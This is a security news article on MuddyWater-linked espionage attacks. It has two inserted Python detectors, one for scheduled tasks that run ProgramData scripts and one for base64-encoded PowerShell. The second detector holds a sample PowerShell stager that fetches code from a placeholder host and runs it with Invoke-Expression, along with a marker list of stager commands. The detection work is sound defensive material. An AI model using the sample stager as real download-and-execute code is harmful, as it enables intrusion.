New Cyberespionage Attacks Linked to MuddyWater Campaign

Recent attacks targeting organizations in Turkey, Pakistan and Tajikistan appear to be linked to the previously detailed MuddyWater campaigns, according to Trend Micro.

The MuddyWater campaigns were so named because of the high level of confusion they created, which made attribution to a specific actor difficult. Artifacts associated with MuddyWater, however, were used in attacks targeting the Saudi Arabian government, in assaults linked to a single attack framework last year, and in incidents attributed to the hacking group FIN7.

Based on the targeted organizations and on the focus on gathering information and uploading it to the command and control (C&C) servers, the actors behind these attacks appear mainly focused on espionage, Trend Micro says.

The newly observed attacks feature numerous ties to the previously observed MuddyWater campaigns and also show that “the attackers are not merely interested in a one-off campaign, but will likely continue to perform cyberespionage activities against the targeted countries and industries,” the security firm notes.

Similarities with earlier MuddyWater campaigns include the focus on targets in the Middle East, the use of documents that mimic government organizations, the dropping of a Visual Basic script and a PowerShell script (the VBS executes the PowerShell script), and the use of hundreds of hacked websites as proxies.

Furthermore, the attacks show similar obfuscation processes and internal variables after deobfuscation, Trend Micro says.

Malicious documents targeting individuals working for government organizations and telecommunication companies in Tajikistan use social engineering to trick victims into enabling macros. Some of the payloads were embedded inside the document itself, while others were downloaded from the Internet.

After the macros are enabled, the Visual Basic script and the PowerShell script, both obfuscated, are dropped in the ProgramData directory. A scheduled task whose action points to the VBS script is created to ensure persistence.
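The persistence described above leaves a recognisable trace: a scheduled task whose action launches a .vbs from ProgramData. The following is an added example (not code from the article or from Trend Micro) that parses Task Scheduler XML definitions, as exported by schtasks or recorded in Windows Event ID 4698, and flags tasks matching that pattern; the task names, paths and XML samples are constructed for illustration.

```python
import re
import xml.etree.ElementTree as ET

# Namespace of the Task Scheduler XML schema (used by "schtasks /Query /XML" and Event ID 4698).
TASK_NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}

# A .vbs path under ProgramData, whether given as %ProgramData% or as a drive-letter path.
VBS_IN_PROGRAMDATA = re.compile(r"""(?:%programdata%|[a-z]:\\programdata)\\[^\s"']*\.vbs""", re.IGNORECASE)


def extract_exec_actions(task_xml: str):
    """Return (command, arguments) for every <Exec> action in one task definition."""
    root = ET.fromstring(task_xml)
    actions = []
    for exec_node in root.findall(".//t:Actions/t:Exec", TASK_NS):
        cmd = (exec_node.findtext("t:Command", default="", namespaces=TASK_NS) or "").strip()
        args = (exec_node.findtext("t:Arguments", default="", namespaces=TASK_NS) or "").strip()
        actions.append((cmd, args))
    return actions


def is_suspicious_task(task_xml: str) -> bool:
    """True if any action runs, or passes to a script host, a .vbs located under ProgramData."""
    return any(VBS_IN_PROGRAMDATA.search(f"{cmd} {args}") for cmd, args in extract_exec_actions(task_xml))


def find_suspicious_tasks(tasks: dict) -> list:
    """Given {task_name: task_xml}, return the names of tasks matching the pattern, sorted."""
    return sorted(name for name, xml in tasks.items() if is_suspicious_task(xml))


# Constructed samples: one task mimicking the dropper's persistence, one benign maintenance task.
SAMPLE_TASKS = {
    "\\OfficeUpdateCheck": r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Actions Context="Author">
    <Exec>
      <Command>C:\Windows\System32\wscript.exe</Command>
      <Arguments>"C:\ProgramData\update.vbs"</Arguments>
    </Exec>
  </Actions>
</Task>""",
    "\\Microsoft\\Windows\\Defrag\\ScheduledDefrag": r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Actions Context="Author">
    <Exec>
      <Command>%windir%\system32\defrag.exe</Command>
      <Arguments>-c -h -o -$</Arguments>
    </Exec>
  </Actions>
</Task>""",
}
```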

As part of other attacks, the second file dropped is a base64-encoded text file that yields the PowerShell script after decoding. Another campaign drops three files: an .sct scriptlet file, an .inf file, and a base64-encoded data file. The first two use publicly available code to bypass AppLocker.
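A base64 text file that decodes to a PowerShell script is easy to triage offline. The following added example (not code from the article or from Trend Micro) decodes a candidate blob and scores the result for common PowerShell constructs; it tries both UTF-8 and UTF-16LE plaintext, the latter being the encoding PowerShell's -EncodedCommand expects, which is an assumption about how such files may be packaged rather than a detail the article states. The marker list and the sample scripts are constructed for illustration.

```python
import base64
import binascii
import re

# Constructed list of constructs that commonly appear in a PowerShell stager or backdoor.
POWERSHELL_MARKERS = re.compile(
    r"\$[A-Za-z_]\w*\s*=|Invoke-Expression|\biex\b|Invoke-WebRequest|New-Object\s+Net\.WebClient|"
    r"System\.Net|-EncodedCommand|function\s+\w+\s*\{|\[Convert\]::FromBase64String",
    re.IGNORECASE,
)


def decode_candidates(blob: bytes):
    """Yield (encoding, text) for each plausible plaintext of a base64 blob.
    Whitespace and line breaks are ignored; non-base64 input yields nothing."""
    cleaned = b"".join(blob.split())
    try:
        raw = base64.b64decode(cleaned, validate=True)
    except (binascii.Error, ValueError):
        return
    for enc in ("utf-8", "utf-16-le"):
        try:
            yield enc, raw.decode(enc)
        except UnicodeDecodeError:
            continue


def powershell_score(text: str) -> int:
    """Number of PowerShell marker hits in a decoded text."""
    return len(POWERSHELL_MARKERS.findall(text))


def looks_like_encoded_powershell(blob: bytes, threshold: int = 2):
    """Return (encoding, score) for the best-scoring decoding that reaches the threshold, else None."""
    best = None
    for enc, text in decode_candidates(blob):
        score = powershell_score(text)
        if score >= threshold and (best is None or score > best[1]):
            best = (enc, score)
    return best


# Constructed sample stager (harmless placeholder URL) packaged both ways, plus a benign text file.
SAMPLE_SCRIPT = '$c = New-Object Net.WebClient\n$d = $c.DownloadString("http://example.invalid/stage")\nInvoke-Expression $d\n'
SAMPLE_UTF8 = base64.encodebytes(SAMPLE_SCRIPT.encode("utf-8"))
SAMPLE_UTF16 = base64.encodebytes(SAMPLE_SCRIPT.encode("utf-16-le"))
SAMPLE_BENIGN = base64.encodebytes(b"hello world, this is just a plain text note\n")
```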

The PowerShell script is divided into three parts: one contains global variables (paths, encryption keys, a list of gates and hacked websites used as proxies), the second contains functions related to standard RSA encryption, and the third contains a backdoor function.

The backdoor collects machine information, takes screenshots, and sends all data to the C&C. It also includes support for commands such as clean (attempts to delete all items from drives C, D, E, and F), reboot, shutdown, screenshot, and upload. Communication with the C&C is performed via XML messages.

“It seems that the attackers are actively monitoring the incoming connections to the C&C. In one of our attempts, we sent an improper request to the C&C server, which replied with the following message: ‘Stop!!! I Kill You Researcher.’ This level of personalized messaging implies that the attackers are monitoring what data is going to and from their C&C server,” Trend Micro explained.

The security researchers also discovered what appears to be a false flag in the PowerShell script. If the communication with the C&C fails and the PowerShell script is run from a command line, error messages written in simplified Mandarin Chinese are displayed. The messages appear machine-translated rather than written by a native speaker, Trend’s researchers point out.

Related: Middle East ‘MuddyWater’ Attacks Difficult to Clear Up

Related: Recent Fileless Attacks Linked to Single Framework, Researchers Say

Written By

Ionut Arghire is an international correspondent for SecurityWeek.
